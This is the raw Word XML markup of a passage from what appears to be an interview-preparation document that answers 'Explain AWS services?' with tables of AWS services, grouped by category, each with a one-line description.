          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="908" w:name="_Toc197868122"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>AWS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="908"/>
    </w:p>
    <w:p w14:paraId="0A0A4C15" w14:textId="77777777" w:rsidR="009B11FE" w:rsidRPr="00CE4B95" w:rsidRDefault="009B11FE" w:rsidP="009B11FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D8DD27" w14:textId="4AB54DDF" w:rsidR="009B11FE" w:rsidRPr="00CE4B95" w:rsidRDefault="009B11FE" w:rsidP="009B11FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="909" w:name="_Toc197868123"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain AWS services?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="909"/>
    </w:p>
    <w:p w14:paraId="39D9A322" w14:textId="33A25A55" w:rsidR="00117C28" w:rsidRPr="00813DA5" w:rsidRDefault="00117C28" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00813DA5">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681" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E53D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AWS Services (by Category)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02638706"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1.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CE4B95" w14:paraId="1AAEF29D" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F3FA6D4"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627C8712" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="449E410F" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="001E1347">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 servers in the cloud. You can choose OS, size, and performance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="5ACF89A2" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E56A76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code without provisioning servers (serverless). Supports auto-scaling, pay-per-use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="551B43C8" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66E003E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as-a-Service (PaaS) for deploying apps (e.g., Java, Node.js).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="0F9AE92B" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="120441C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services: ECS (Amazon managed), EKS (Kubernetes).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="2E6E5144" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44EFC4C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fied VPS service for small apps/websites.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="593077B1"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682" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="336CA0E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2.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CE4B95" w14:paraId="3D2082EB" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6965DBC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E6D3AA8" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="234B3A81"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torage for files, backups, media, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="18EBF5DD" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F70066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 storage for EC2, like virtual hard drives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="1EB47479" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F43DE14"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file storage across multiple EC2 instances.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="65C8BE67" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BE5000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term, low-cost archival storage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="613D64A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683" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C83A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CE4B95" w14:paraId="4F362D1D" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1163CE6D"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DF03BE7" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C6D8C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relational databases (MySQL, PostgreSQL, Oracle, SQL Server, MariaDB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="7CDE32DD" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1436E6F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performance, MySQL/PostgreSQL-compatible cloud DB.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="58B7B745" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73523DF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less NoSQL database, key-value store.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="01BB6D67" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AFEBB6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warehousing for analytics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="2BBFAB6C" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E60B1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memory caching (Redis/Memcached).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73202A2B"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684" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FEAEF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4.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CE4B95" w14:paraId="77B90D52" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C8A9FE1"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013E0D64" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1140F47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olated virtual network for AWS resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="44847123" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44945D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NS and domain name management.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="3C076D56" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F5243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Delivery Network (CDN) to serve static and dynamic content globally.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="63A9C572" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03FA43B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 REST/HTTP APIs to the internet or internal apps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="639F50A6" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03088C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 traffic across EC2 or containers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71E5EDC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685" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE1018E"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5.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CE4B95" w14:paraId="1000817B" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F057907"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335DB22" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E740C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role management and fine-grained permission control.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="39656E0B" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0424746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ryption key management.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="6606DA5E" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033B76E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 and manage secrets like API keys, DB credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="276DD93F" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FF4329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gnito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4646DBD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authentication and access control for web/mobile apps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C341A8E"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686" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EB9D2B"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 xml:space="preserve">6.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CE4B95" w14:paraId="3A8BFF17" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF93D7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BC791F8" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27C5E3A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logs, metrics, and set alerts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="32014898" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4237B86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dit AWS API calls and account activity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="3884D2CD" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="764ABC9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CD pipeline orchestration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="5121B96C" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A97DF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and deploy automation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="57B1DC6B" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D3411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frastructure as Code (IaC) using YAML/JSON templates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="0766D4DB" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D61D21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image storage and versioning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F008E48"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687" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F26E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7.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CE4B95" w14:paraId="6481B1E0" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1463BE4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B0E7AC3" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E91B9C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to-end machine learning platform.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="0A5160F6" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="358860E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 and video analysis (face, objects, text).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="0EDBE0D9" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F0178D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Language Processing (sentiment, entity recognition).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="016A542B" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="244D956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conversational interfaces (chatbots).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="0229D442" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672BB5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 translation, speech synthesis, text extraction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19C09E27"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688" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7FFE2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8.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CE4B95" w14:paraId="5AAE2A1F" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02463A0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53FD43DD" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6692BD4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and-line tool for managing AWS resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="06547DDA" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="362156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specific libraries (Java, Python, Node.js, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="30CC5E2A" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726CBB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ine IDE integrated with AWS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B4531F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689" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="189BDB15"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9.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CE4B95" w14:paraId="7043D87E" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E30672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1CCBA42A" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75D549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queuing for decoupling systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="15EB819C" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B65AAA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Sub for notifications (SMS, email, Lambda, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="715C3C34" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06D7E9F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flow orchestration service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
